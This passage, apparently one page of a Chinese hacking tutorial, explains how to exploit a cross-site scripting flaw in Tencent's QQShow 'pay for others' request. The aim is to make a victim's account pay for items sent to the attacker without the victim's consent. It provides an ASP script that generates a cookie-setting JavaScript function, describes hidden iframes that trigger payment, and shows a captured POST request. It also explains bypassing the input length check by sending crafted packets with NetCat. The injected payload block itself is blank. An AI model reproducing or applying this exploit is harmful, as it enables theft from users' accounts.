跨站构造

我们需要用户执行查看物品页面中的函数AskAccept()的一部分代码，即前面设置cookies的代码，而暂时不能进行页面的跳转，因为如果页面被重定向到了cl_cart.html这个页面的话，我们就失去了对客户端的控制权，但是在页面cl_cart.html又进行了某些设置cookies的操作，所以我们还要用别的方法调用这个页面，同理，我们也要调用页面http://qqshow.qq.com/cgi-bin/qqshow_user_ask_pass来进行支付的操作。
因此我们最终的利用方法是自己构造一个函数Y()，这个函数包括了AskAccept()的设置cookies的代码，但是不包括页面跳转的代码，然后我们用iframe打开页面cl_cart.html和http://qqshow.qq.com/cgi-bin/qqshow_user_ask_pass，完成支付的操作。
大概的流程清楚了，我们还有很多细节问题需要解决。
第一个细节就是获得函数Y()(即原来的AskAccept()函数)中要设置的cookies的值，当然，我们不能通过查看只有被要求支付用户才能查看的页面源代码来获得值，怎么办呢，经过笔者分析，用户打开请求的页面地址中包括了要设置的cookies的值，我们只要根据这个页面地址来生成函数就可以了。所以我们还要使用一个asp文件，我们构造的asp文件的内容是：
[code]<%
'GetUrl By Blackcat@Blackwoods http://www.blackwoods.cn
'这里截取传来参数中的字符，得到几个参数的值
Dim strUrl,strsenduin,strrecvuin,strsendid,strsession
strUrl = Trim(request.Servervariables("QUERY_STRING"))
strsenduin = Mid(strUrl,Instr(strUrl,"senduin=")+8,Instr(strUrl,"recvuin")-Instr(strUrl,"senduin=")-9)
strrecvuin = Mid(strUrl,Instr(strUrl,"recvuin=")+8,Instr(strUrl,"sendid")-Instr(strUrl,"&recvuin=")-10)
strsendid = Mid(strUrl,Instr(strUrl,"sendid=")+7,Instr(strUrl,"session")-Instr(strUrl,"sendid=")-8)
strsession = Mid(strUrl,Instr(strUrl,"session=")+8,Instr(strUrl,"cl")-Instr(strUrl,"session=")-9)
%>
function Y()
{
 SendItem('夏季水果', '17625', '36', '24', 1, 2, '148122410', '95534');
 if (0) {
  window.location="/mall/inc/cart.html";
 }
 else {
  setCookie('asksession', '<%=strsession%>');
  setCookie('senduin', '<%=strsenduin%>');
  setCookie('recvuin', '<%=strrecvuin%>');
  setCookie('sendid', '<%=strsendid%>');
 }
 document.write("")
//实际应用时应将两个iframe的长宽都设为0以达到隐藏的目的
}
[/code]
     我们还要构造SendItem相关参数的值，这个就好构造的多了，因为SendItem这个函数是腾讯编写的通用函数中检测商品并设置购物车的，我们用自己的两个号来获得相关的参数：使用自己的号A，登陆QQ秀网站，购买相关的物品，然后使用“他人支付”，支付人填写自己的号码B，然后用号码B在QQ客户端登陆，查看弹出的请求页面的源代码中AskAccept()函数的相关代码，然后在我们构造的asp文件中修改，当然了，倒数第二个参数要改为我们自己接受获赠物品的号码。

漏洞利用

首先我们要根据上面介绍的方法，构造一个asp文件，上传到我们自己的支持asp的空间上，这里我们假设其地址为
然后我们就要在他人支付请求中填写跨站代码了，可是事情不是那么简单，QQ秀的这个页面作了表单检测，如果填写的字符多于100个字母(50个汉字)，就返回错误，但是我们填写的字符肯定要大于那个数的，而我们把页面保存到本地，删除掉检测的代码再提交，又会显示错误，看来腾讯作了防止外部提交的处理，因此我们用发包的方法来解决。
我们进行一次正常的请求的提交，并使用工具WinsockExpert来抓包，抓得包的内容如下：
[code]
POST /cgi-bin/qqshow_user_askfor HTTP/1.1
……(无关内容省略，下面是我们发送的表单参数。)
items=17698&nowprice=40&itemname=%BB%A8%BC%BE%D3%EA%BC%BE&vipprice=http%3A%2F%2Fqqshow.qq.com%2Fmall%2Finc%2Freq01.html%3Fitemno%3D17698%26nowprice%3D40%26itemname%3D%BB%A8%BC%BE%D3%EA%BC%BE%26vipprice%3D&itemtype=show.qq.com%2Fmall%2Finc%2Freq01.html%3Fitemno%3D17698%26nowprice%3D40%26itemname%3D%BB%A8%BC%BE%D3%EA%BC%BE%26vipprice%3D27&recvuin=15300898&message=Hanguofeng&x=10&y=13
[/code]
请注意上面标为黑体的Hanguofeng，这个就是我们填写的给被请求者的留言，我们来构造自己的代码：
[code]

[/code]
这里我们用js写一个包含外部脚本的代码，并将页面地址作为一个参数传递给我们的生成外部js的asp页面0.asp，然后我们执行函数Y()。
当然，作为合法的Http请求，我们还需要将这些代码进行URL编码。
然后将这段代码替换掉Hanguofeng,并算出请求的长度，更改前面的Content-Length: 384中384的值。然后用网络军刀NetCat来发包，发完包对方的QQ就会弹出消息，当被请求人打开的时候，如果他的账户余额够，那么我们的支付请求就已经强行通过了，不需要被请求人作任何动作。

上一页  [1] [2] [3] [4] 下一页